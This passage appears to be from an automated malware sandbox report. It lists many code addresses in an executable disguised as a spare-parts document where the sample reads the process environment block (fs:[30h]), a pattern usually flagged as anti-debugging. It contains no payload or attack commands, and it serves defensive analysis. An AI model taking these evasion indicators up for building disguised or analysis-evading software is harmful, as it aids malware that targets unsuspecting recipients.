                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]4_2_012343D4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]4_2_012343D4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov ecx, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]4_2_0123E3DB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118823B mov eax, dword ptr fs:[00000030h]4_2_0118823B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196259 mov eax, dword ptr fs:[00000030h]4_2_01196259
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A250 mov eax, dword ptr fs:[00000030h]4_2_0118A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]4_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218243 mov eax, dword ptr fs:[00000030h]4_2_01218243
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218243 mov ecx, dword ptr fs:[00000030h]4_2_01218243
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118826B mov eax, dword ptr fs:[00000030h]4_2_0118826B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]4_2_0124A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]4_2_0124A250
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]4_2_01194260
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov ecx, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]4_2_012262A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]4_2_011CE284
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]4_2_011CE284
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]4_2_01210283
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]4_2_011A02A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]4_2_011A02A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]4_2_0119A2C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]4_2_011A02E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226500 mov eax, dword ptr fs:[00000030h]4_2_01226500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]4_2_011BE53E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]4_2_01264500
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]4_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]4_2_01198550
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]4_2_01198550
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]4_2_011C656A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE59C mov eax, dword ptr fs:[00000030h]4_2_011CE59C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]4_2_012105A7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]4_2_012105A7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]4_2_012105A7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4588 mov eax, dword ptr fs:[00000030h]4_2_011C4588
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01192582 mov eax, dword ptr fs:[00000030h]4_2_01192582
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01192582 mov ecx, dword ptr fs:[00000030h]4_2_01192582
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B45B1 mov eax, dword ptr fs:[00000030h]4_2_011B45B1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B45B1 mov eax, dword ptr fs:[00000030h]4_2_011B45B1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011965D0 mov eax, dword ptr fs:[00000030h]4_2_011965D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA5D0 mov eax, dword ptr fs:[00000030h]4_2_011CA5D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA5D0 mov eax, dword ptr fs:[00000030h]4_2_011CA5D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE5CF mov eax, dword ptr fs:[00000030h]4_2_011CE5CF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE5CF mov eax, dword ptr fs:[00000030h]4_2_011CE5CF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC5ED mov eax, dword ptr fs:[00000030h]4_2_011CC5ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC5ED mov eax, dword ptr fs:[00000030h]4_2_011CC5ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011925E0 mov eax, dword ptr fs:[00000030h]4_2_011925E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]4_2_011BE5E7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]4_2_01216420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]4_2_011C8402
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]4_2_011C8402
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]4_2_011C8402
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA430 mov eax, dword ptr fs:[00000030h]4_2_011CA430
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]4_2_0118E420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]4_2_0118E420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]4_2_0118E420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C427 mov eax, dword ptr fs:[00000030h]4_2_0118C427
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B245A mov eax, dword ptr fs:[00000030h]4_2_011B245A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121C460 mov ecx, dword ptr fs:[00000030h]4_2_0121C460
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118645D mov eax, dword ptr fs:[00000030h]4_2_0118645D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]4_2_011CE443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]4_2_011BA470
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]4_2_011BA470
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]4_2_011BA470
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A456 mov eax, dword ptr fs:[00000030h]4_2_0124A456
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121A4B0 mov eax, dword ptr fs:[00000030h]4_2_0121A4B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C44B0 mov ecx, dword ptr fs:[00000030h]4_2_011C44B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011964AB mov eax, dword ptr fs:[00000030h]4_2_011964AB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124A49A mov eax, dword ptr fs:[00000030h]4_2_0124A49A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011904E5 mov ecx, dword ptr fs:[00000030h]4_2_011904E5
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190710 mov eax, dword ptr fs:[00000030h]4_2_01190710
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C0710 mov eax, dword ptr fs:[00000030h]4_2_011C0710
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120C730 mov eax, dword ptr fs:[00000030h]4_2_0120C730
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC700 mov eax, dword ptr fs:[00000030h]4_2_011CC700
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C273C mov eax, dword ptr fs:[00000030h]4_2_011C273C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C273C mov ecx, dword ptr fs:[00000030h]4_2_011C273C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C273C mov eax, dword ptr fs:[00000030h]4_2_011C273C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC720 mov eax, dword ptr fs:[00000030h]4_2_011CC720
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC720 mov eax, dword ptr fs:[00000030h]4_2_011CC720
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190750 mov eax, dword ptr fs:[00000030h]4_2_01190750
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2750 mov eax, dword ptr fs:[00000030h]4_2_011D2750
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2750 mov eax, dword ptr fs:[00000030h]4_2_011D2750
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C674D mov esi, dword ptr fs:[00000030h]4_2_011C674D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C674D mov eax, dword ptr fs:[00000030h]4_2_011C674D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C674D mov eax, dword ptr fs:[00000030h]4_2_011C674D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198770 mov eax, dword ptr fs:[00000030h]4_2_01198770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
